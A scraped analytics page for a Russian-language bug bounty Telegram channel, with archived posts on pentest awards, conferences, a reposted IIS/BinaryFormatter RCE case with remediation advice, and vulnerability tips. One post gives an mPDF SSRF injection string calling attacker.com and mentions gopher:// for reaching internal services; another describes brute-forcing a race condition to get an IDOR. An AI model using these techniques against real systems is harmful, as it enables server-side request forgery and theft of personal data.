ru
Feedback
SHADOW:Group

SHADOW:Group

Открыть в Telegram

Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn

Больше

📈 Аналитический обзор Telegram-канала SHADOW:Group

Канал SHADOW:Group (@shadow_group_tg) языкового сегмента Русский является активным участником. Сейчас сообщество объединяет 11 493 подписчиков, занимая 10 489 место в категории Технологии и приложения и 55 704 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 11 493 подписчиков.

Согласно последним данным от 26 августа, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило -2, а за последние 24 часа — 0, при этом общий охват остаётся высоким.

  • Статус верификации: Не верифицирован
  • Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 30.16%. В первые 24 часа после публикации контент обычно набирает 10.54% реакций от общего числа подписчиков.
  • Охват публикаций: В среднем каждый пост получает 3 467 просмотров. В течение первых суток публикация набирает 1 212 просмотров.
  • Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 59.
  • Тематические интересы: Контент сосредоточен на ключевых темах, таких как middleware, http/1.1, bounty, api, host.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn

Благодаря высокой частоте обновлений (последние данные получены 27 августа, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

11 493
Подписчики
Нет данных24 часа
Нет данных7 дней
-230 день
Архив постов
Repost from Backconnect
Разбор как нашлась CVE-2026-18963: Keycloak reset-credentials flow ATO https://www.pruva.dev/reproductions/REPRO-2026-00337#artifacts Нуклей шаблон для проверки https://github.com/projectdiscovery/nuclei-templates/pull/16995/files ____ 🤓 backconnect

Repost from purple shift
Объявлены результаты конкурса Pentest Awards 2026! И мы постепенно будем публиковать интересные кейсы, с которыми наши экспер
Объявлены результаты конкурса Pentest Awards 2026! И мы постепенно будем публиковать интересные кейсы, с которыми наши эксперты участвовали в этом конкурсе. Первым поздравляем Виктора Зварыкина: он уже второй год подряд забирает медаль "фаворит года по версии жюри". Вот что говорит сам автор о своём призовом кейсе: "Глубина — история о том, почему в информационной безопасности недостаточно просто запустить готовый инструмент и получить результат. Главный герой находит уязвимость в реальной системе, но довольно быстро понимает, что успешный взлом — это только начало. Вместе с более опытным другом он начинает разбираться, как устроена система и почему возможна эксплуатация этого вектора. Весь рассказ погружён в атмосферу цикла произведений "Глубина" Сергея Лукьяненко, где цифровой мир становится почти настоящим." Суть кейса кратко: Работы по анализу защищённости проходили в крупной иностранной компании, одной из главных задач пентеста было пробитие внешнего периметра. На этапе OSINT-разведки был обнаружен веб-интерфейс IIS (Internet Information Services), в котором часто встречается уязвимость чтения имен файлов и директорий в legacy-формате 8.3. Вследствие этого был обнаружен эндпоинт с неизвестным веб-сервисом, войти в который получилось благодаря нативно используемым учетным данным. Разобравшись с функциональностью приложения, наши герои выявили, что в одном из запросов информация передавалась как .NET-сериализованный объект, использовавший небезопасный сериализатор BinaryFormatter. Успешная эксплуатация привела к RCE через DNS-эксфильтрацию. Как избежать подобных атак: (1) Параметр реестра NtfsDisable8dot3NameCreation используется для управления созданием коротких имен файлов (в формате 8.3) на томах NTFS в операционных системах Windows. Этот параметр важен для обеспечения совместимости со старыми приложениями, использующими соглашение об именовании файлов 8.3, однако он также может влиять на производительность и безопасность. Чтобы устранить уязвимость, нужно поменять значение параметра NtfsDisable8dot3NameCreation на 1. Путь к нему: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation Перед изменением значения необходимо проверить функционал работающих сервисов, чтобы не нарушить работу legacy-приложений. (2) Полностью откажитесь от BinaryFormatter: его крайне сложно безопасно настроить или защитить фильтрацией. Используйте современные сериализаторы — например, System.Text.Json, а принимаемые данные проверяйте по заранее определённой структуре и разрешённым типам. Для компактного бинарного формата Microsoft рекомендует MessagePack или protobuf-net; для XML — DataContractSerializer. Начиная с .NET 9 встроенная реализация BinaryFormatter уже отключена. (3) Используйте сложные и несловарные пароли для аутентификации в веб-сервисы. Полную версию кейса Виктора в стиле "Глубины" читайте в нашем гитхабе.

Постов не будет, админ ушел сниматься в рилсах…

В этом году Pentest Award прошел в атмосфере роскоши, с шикарным видом на набережную и город. Удалось пообщаться с сильными п
+2
В этом году Pentest Award прошел в атмосфере роскоши, с шикарным видом на набережную и город. Удалось пообщаться с сильными профессионалами и послушать несколько кулстори из их практики. Ну и естественно узнать немного инсайдов непосредственно от победителей. Кстати, итоги церемонии можете глянуть на Хабре. Многие вроде как планируют опубликовать свои работы на хакере, так что в скором времени вы и сами с ними ознакомитесь, там действительно есть уникальные материалы. Отдельное спасибо @poopsa_liza за приглашение и организацию, все прошло отлично. Кому интересно глянуть фоточки они есть тут, а также есть запись трансляции с самого награждения.

ТБанк вместо одной кнопки "Бабло", прислал сразу три. Осталось переписать скрипт, чтобы сразу Claude запускался.

Видеосообщение00:10

Если вы, как и я, откладывали статью до последнего, то пора отправлять.

Вокруг все такие молодые, красивые, богатые и успешные, поэтому призываю вас подать свою заявку на OFFZONE, чтобы рассказать, как стать таким же.

В эту пятницу планирую посетить конференцию Периметр от Metascan'a и вечером на оффлайн часть Bugs Zone. Если будет кто из подписчиков и знакомых, пишите, буду рад пообщаться 👀

Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы по
Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы получить какой-нибудь IDOR, достаточно очень много раз попросить об этом приложение. В кейсе на скрине, как раз такой случай. При указании чужого id получаем ошибку, однако, если запустить intruder и подождать несколько тысяч запросов, сервер внезапно начинает отдавать нам чужие ПД. #web #race #idor

Стартовал прием заявок на Pentest Award 2026 и в этом году появилась новая номинация - AI. Думаю, за последний год у многих есть что сказать по этой теме. Остальные номинации также на месте: Kill Chain, Системный взлом (Web & Logic), Device и Out of Scope. Среди призов стандартно респект от комьюнити и техника Apple. Заявки принимают до 12 июля, а церемония награждения пройдет 14 августа в мск. https://t.me/justsecurity/441

Repost from BI.ZONE Bug Bounty
🪲 Топовый мерч, две недели закрытого скоупа, ламповая афтепати-вечеринка… Все это ждет вас на нашем любимом приватном ивенте
🪲 Топовый мерч, две недели закрытого скоупа, ламповая афтепати-вечеринка… Все это ждет вас на нашем любимом приватном ивенте — BUGS ZONE 7.0. Приглашения, как обычно, отправим багхантерам с лучшими результатами за сезон. 🔵Старт хантинга — 15 апреля. 🔵Церемония и афтепати — 22 мая в Москве. Попасть на ивент может каждый. Сдавайте отчеты на нашей платформе и качайте рейтинг — мы обязательно заметим самых активных. Скоро поделимся подробностями. Следите за апдейтами!

У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...
У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без <style>. Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf

Искал тут что посмотреть под еду на ютубе, и реки вывели мне сей шедевр. Прекрасно все, начиная с кулстори самого проекта, который форсили во многих изданиях, заканчивая сайтом на пыхе с паролями юзеров в открытом виде. https://www.youtube.com/watch?v=HGbP2ibfm8k

Repost from Ocherk BB
Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложит
Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложить у себя в навыках ту или иную багу немного глубже.😵‍💫 Так вот, в итоге из этой мысли я сделал: https://labs.hackadvisor.io/ Все машинки собраны из публичных репортов и статей ресерчеров. Сейчас можно разворачивать стенд, решать задачи, получать подсказки и разбор уязвимости по итогу. Буду потихоньку пилить интересные машинки из раскрытых отчётов — надеюсь, вы тоже закинете что-то интересное: оно обязательно появится. Сразу дисклеймер: у меня пока небольшой опыт в создании таких заданий, так что где-то может быть шероховато. Но со временем буду делать лучше — и сами задания, и их подачу — и добавлять больше интересных сценариев. В целом Labs — это всего лишь MVP и первый этап будущей полноценной экосистемы HackAdvisor, которая, как и всё для сообщества, совершенно бесплатна. Всех обнял, жду фидбек, баги и фича-реквесты🙌🏻 Ну и, пожалуйста, не ломайте сам Labs (даже если очень хочется) — пока там всё очень хрупко 🫠

Захват аккаунта через telegram-бот: от своего номера к чужому профилю Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных. Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/

Друзья, поздравляю вас с наступающим Новым годом 🎄 Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, н
Друзья, поздравляю вас с наступающим Новым годом 🎄 Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, новых положительных эмоций и ощущения, что вы идёте в правильном направлении. Желаю интересных и результативных находок, роста там, где вам действительно важно, и достижения новых высот. Постарайтесь отдохнуть в эти праздники и набраться сил. Пусть в новом году всё станет хотя бы немного лучше, чем в прошлом. Спасибо, что вы здесь. Увидимся в 2026 ❤️

кстати, это я) узнали? согласны?
кстати, это я) узнали? согласны?

Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть
Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть на нем множество знакомых лиц из багбаунти сообщества. Я узнал примерно половину)

Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им бол
Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им большой респект 😎